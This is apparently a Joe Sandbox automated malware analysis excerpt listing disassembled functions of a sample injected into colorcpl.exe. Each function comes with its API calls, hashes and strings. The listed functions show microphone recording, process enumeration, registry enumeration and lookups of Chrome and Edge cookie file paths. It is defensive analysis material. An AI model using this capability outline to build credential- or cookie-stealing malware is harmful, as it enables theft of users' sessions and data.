                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                                                                                                              • Instruction ID: a368ecf65b26fd3579365a79616369d3df85c88b1cae378c78cad910cd43353f
                                                                                                                              • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                                                                                                              • Instruction Fuzzy Hash: 8951B271E00226EFEBA4DF69CD41A7A77F4EF48721F14466AE909DB250E731E900CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A9365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,046BF234), ref: 046A93CF
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D2764,000000FF,00000000,0000003F,00000000,?,?), ref: 046A9447
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,046D27B8,000000FF,?,0000003F,00000000,?), ref: 046A9474
                                                                                                                              • _free.LIBCMT ref: 046A93BD
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046A9589
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1286116820-0
                                                                                                                              • Opcode ID: cf168510ca4c32d9a90407b2582314fa4504b426b31dd388fa18039d63967794
                                                                                                                              • Instruction ID: a20ae3bf658a2101a3038cb629358db3e2244074122d680455bf6fa08068cd1a
                                                                                                                              • Opcode Fuzzy Hash: cf168510ca4c32d9a90407b2582314fa4504b426b31dd388fa18039d63967794
                                                                                                                              • Instruction Fuzzy Hash: 4251C6B1D00709ABDB24EFA4DC809AAB7BCEF55314B2006AAD55497280FB34AD55CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0466F91B
                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0466F93F
                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0466F94E
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0466FB05
                                                                                                                                • Part of subcall function 0467BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0466F5F9,00000000,?,?,046D5338), ref: 0467BFFA
                                                                                                                                • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
                                                                                                                                • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0466FAF6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4269425633-0
                                                                                                                              • Opcode ID: 94dcd9fffb6ddca2137af57dd9eef8f294ab92c2741bda7b053b80b09d0c2e31
                                                                                                                              • Instruction ID: f9a3aea1b16820b303057594400487bf39a150564cdb32458269856365f36132
                                                                                                                              • Opcode Fuzzy Hash: 94dcd9fffb6ddca2137af57dd9eef8f294ab92c2741bda7b053b80b09d0c2e31
                                                                                                                              • Instruction Fuzzy Hash: 074156315082459BE324FB61DC50AFFB3E9AF95309F50492DE48B82190FF347A4AC796
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A3DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 702f49b50218ec9e6a6b85ebb980d94754d1b54fdcec9eeb1255a4fac9b573cd
                                                                                                                              • Instruction ID: 8195f9e86b3b1a99295401345be8255eeb04ae6b80757dbba9eccb694f76d946
                                                                                                                              • Opcode Fuzzy Hash: 702f49b50218ec9e6a6b85ebb980d94754d1b54fdcec9eeb1255a4fac9b573cd
                                                                                                                              • Instruction Fuzzy Hash: 8441C136A006109FDB24DF78C881A9EB3F5FF89714F1545AAE915EB380EA71BD51CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0671B546 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __dosmaperr$_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 242264518-0
                                                                                                                              • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                              • Instruction ID: 8aa0de7c2967b83080a16613e75a983a8e1450fd885c43409c9e729336662002
                                                                                                                              • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                              • Instruction Fuzzy Hash: 2A31A67190421EBFDF519FA9DC48DAF3B7CEF05660B144256FA209A1A0EB31C950CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0469F8C8,?,00000000,?,00000001,?,?,00000001,0469F8C8,?), ref: 046B1179
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B11B1
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 046B1202
                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0469AE84,?), ref: 046B1214
                                                                                                                              • __freea.LIBCMT ref: 046B121D
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1857427562-0
                                                                                                                              • Opcode ID: e0c7cddde11e8be1e22943d6973e8fd23ecbe4917915bb8571c2475849ab2d28
                                                                                                                              • Instruction ID: b6e1e50f1bbcc9b6c3b6d6ab22ff5d7f894753f9e05d9f09a506ed02eec72450
                                                                                                                              • Opcode Fuzzy Hash: e0c7cddde11e8be1e22943d6973e8fd23ecbe4917915bb8571c2475849ab2d28
                                                                                                                              • Instruction Fuzzy Hash: 3031BC72A0021AABDF25DFA5DC50DEE7BA5EB51350B084168EC04DB290F735EDA1CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04661BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04661BF9
                                                                                                                              • waveInOpen.WINMM(046D2AC0,000000FF,046D2AA8,Function_00001D0B,00000000,00000000,00000024), ref: 04661C8F
                                                                                                                              • waveInPrepareHeader.WINMM(046D2A88,00000020), ref: 04661CE3
                                                                                                                              • waveInAddBuffer.WINMM(046D2A88,00000020), ref: 04661CF2
                                                                                                                              • waveInStart.WINMM ref: 04661CFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1356121797-0
                                                                                                                              • Opcode ID: ed1bb27ac76961062bca86eef0472d1fc34393a87888cd0830df0e6fe52119c5
                                                                                                                              • Instruction ID: ff62457c75d611412fa829a824888a86ebb57de04093bf183e45fa88baf13ab3
                                                                                                                              • Opcode Fuzzy Hash: ed1bb27ac76961062bca86eef0472d1fc34393a87888cd0830df0e6fe52119c5
                                                                                                                              • Instruction Fuzzy Hash: 83217C71E062019FD724DF25E8389567BB5FB8471470860AEA106CB690FB3C5C00CF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AF35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 046AF363
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046AF386
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 046AF3AC
                                                                                                                              • _free.LIBCMT ref: 046AF3BF
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 046AF3CE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2278895681-0
                                                                                                                              • Opcode ID: 7887444f265d64aba4fe66cd5ff80dc6931bc5d2aa9c703e01f7b6e7b084dc2c
                                                                                                                              • Instruction ID: 40ad9ad03ee2cc7efd26b2e76444f514aec74eceae0be677734614e8ef844f34
                                                                                                                              • Opcode Fuzzy Hash: 7887444f265d64aba4fe66cd5ff80dc6931bc5d2aa9c703e01f7b6e7b084dc2c
                                                                                                                              • Instruction Fuzzy Hash: CB01B1B2601B147B232516AA5C8CC7B7A6CDEC6AA4315012DF904C2300FA64AD1299F1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04671163 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04671170
                                                                                                                              • int.LIBCPMT ref: 04671183
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0466E0D2
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0466E0EC
                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 046711C3
                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 046711CC
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 046711EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2536120697-0
                                                                                                                              • Opcode ID: 7143892b902b325c135d1188f51578cbd93cba95a722d9746eb8eea1ecc6940a
                                                                                                                              • Instruction ID: f005b9939135f867a2f398724133f207a80b0bcc2c5bb9675285826b026f3cc0
                                                                                                                              • Opcode Fuzzy Hash: 7143892b902b325c135d1188f51578cbd93cba95a722d9746eb8eea1ecc6940a
                                                                                                                              • Instruction Fuzzy Hash: E011A772A00118A7DB15FFA4E8048EDBBB9DF41654B10055FE805A7390FB71BE4187D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0671B066 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0671B082
                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0671B09B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Value___vcrt_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1426506684-0
                                                                                                                              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                              • Instruction ID: a2e6a5c1d0810d24097753e4042e950d97739f09a0c57a48fc1a7d0896f065ae
                                                                                                                              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                              • Instruction Fuzzy Hash: 3001F73262C355EEA7F427BC7E99A7A2A49EB01EB5720033BF3385E4F0EF1148819154
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A8299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(0000000A,0000000B,0000000A,046A05E2,046A1CCB,00000000,?,?,?,?,046A1EAE,00000000,0000000A,000000FF,0000000A,00000000), ref: 046A829E
                                                                                                                              • _free.LIBCMT ref: 046A82D3
                                                                                                                              • _free.LIBCMT ref: 046A82FA
                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 046A8307
                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 046A8310
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3170660625-0
                                                                                                                              • Opcode ID: 143fd6256ec32bc6b3b13591ea38ad23eb6f1f8186aba34d6b1ffc2615af98c7
                                                                                                                              • Instruction ID: 1a55e3e3f3fdc58ea2845fed87e6220b5bd732d3899de79face4823a3e57bf6e
                                                                                                                              • Opcode Fuzzy Hash: 143fd6256ec32bc6b3b13591ea38ad23eb6f1f8186aba34d6b1ffc2615af98c7
                                                                                                                              • Instruction Fuzzy Hash: E5014936604F0027E31176756C88A6B2529DFD2279720102CFC1593380FF74EC654DE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B09BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046B09D4
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046B09E6
                                                                                                                              • _free.LIBCMT ref: 046B09F8
                                                                                                                              • _free.LIBCMT ref: 046B0A0A
                                                                                                                              • _free.LIBCMT ref: 046B0A1C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 0980b8a8c4d5b74c25e6aed833d99bc80325ea17975a4e5a5342995d4216327d
                                                                                                                              • Instruction ID: f75a1c927d91e391933c2849df85d099deb28184cc736a473bdca55f94711d52
                                                                                                                              • Opcode Fuzzy Hash: 0980b8a8c4d5b74c25e6aed833d99bc80325ea17975a4e5a5342995d4216327d
                                                                                                                              • Instruction Fuzzy Hash: 3FF0AF32911600B79320EA58F8C1D9B37DDEA253153589909F0A8D3602FA34FCC08BD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 067316C8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                              • Instruction ID: d4a82ebc6d8f6a8f04241fb790f84646087bde7bbf14ca96657fa65f0669a3c6
                                                                                                                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                              • Instruction Fuzzy Hash: 71F03632904235A787E4EB58FEC5C2677DDEA08751BE88919F258DB911CB30F8C0C669
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06724D54 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                              • Instruction ID: 71c845cd7ecb697d89eb8a1bacdce54c830b13b5a2a53d2be8274607f1b8ad6e
                                                                                                                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                              • Instruction Fuzzy Hash: E9F0DAB18019399FC7B5AF2CBF444553B62B7046607254226F62C66A74C77545C2CFCA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673A55 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 04673ABC
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 04673AEB
                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 04673B8B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                              • String ID: [regsplt]
                                                                                                                              • API String ID: 3554306468-4262303796
                                                                                                                              • Opcode ID: c985fee9f232a6ec079f77fd64d3668d8bafa4fb8c1292ec5f7f3d68d28bdf20
                                                                                                                              • Instruction ID: b2e447c6e547cf0dc5932b33d57b0f63a83843a5d50c7ed9371ebaa8c43f8436
                                                                                                                              • Opcode Fuzzy Hash: c985fee9f232a6ec079f77fd64d3668d8bafa4fb8c1292ec5f7f3d68d28bdf20
                                                                                                                              • Instruction Fuzzy Hash: 4E512C72900219AAEB10EBA4DC95EEFB7BDEF15308F500069E506E2150FF707A48CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AE6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _strpbrk.LIBCMT ref: 046AE738
                                                                                                                              • _free.LIBCMT ref: 046AE855
                                                                                                                                • Part of subcall function 0469BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0469BCEB,00000000,0000000A,0000000A,00000000,0467BBB2,00000022,?,?,0469BCF8,00000000,00000000,00000000,00000000,00000000), ref: 0469BD1B
                                                                                                                                • Part of subcall function 0469BD19: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0469BD3D
                                                                                                                                • Part of subcall function 0469BD19: TerminateProcess.KERNEL32(00000000), ref: 0469BD44
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                              • String ID: *?$.
                                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                                              • Opcode ID: f0ff77802291893847901539d3f82721080a50fc97b19214d628675dbc1211fa
                                                                                                                              • Instruction ID: 6957d74dcfdfc574d21f4dc59e50886b0eb2c3938adabcc989f9d9d46e1cc871
                                                                                                                              • Opcode Fuzzy Hash: f0ff77802291893847901539d3f82721080a50fc97b19214d628675dbc1211fa
                                                                                                                              • Instruction Fuzzy Hash: 03517E75E40609AFDF14DFA8C880AADBBB5EF58314F24816ED854E7340E672AE11CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0672F3F5 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free_strpbrk
                                                                                                                              • String ID: *?$.
                                                                                                                              • API String ID: 3300345361-3972193922
                                                                                                                              • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                              • Instruction ID: 5fa487a3dae3a6706e7cbfa6d74b864a03c30c8cf0eb3df140a7f669d54e4e0a
                                                                                                                              • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                              • Instruction Fuzzy Hash: 1251C171E4022AAFDF54DFA8CC80ABDBBF5FF48314F24816AD954E7340E6799A418B50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0466C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0466C61D
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0466C688
                                                                                                                              Strings
                                                                                                                              • User Data\Default\Network\Cookies, xrefs: 0466C603
                                                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0466C635
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                              • API String ID: 1174141254-1980882731
                                                                                                                              • Opcode ID: d32248a3927bbc6cd77e69a0429793df849750bba969909f2dafb00562b47f8a
                                                                                                                              • Instruction ID: cde74c79eeae9ef3bdc6f779418c5d7a2928efd1ba1e1352f4ff8d9ffc07bcd7
                                                                                                                              • Opcode Fuzzy Hash: d32248a3927bbc6cd77e69a0429793df849750bba969909f2dafb00562b47f8a
                                                                                                                              • Instruction Fuzzy Hash: 5A2100719001199ADB04FBA5DC69CFEBB7CEE51619F40012DE547A3194FF30BA4ACAD8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0466C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0466C559
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0466C6EC
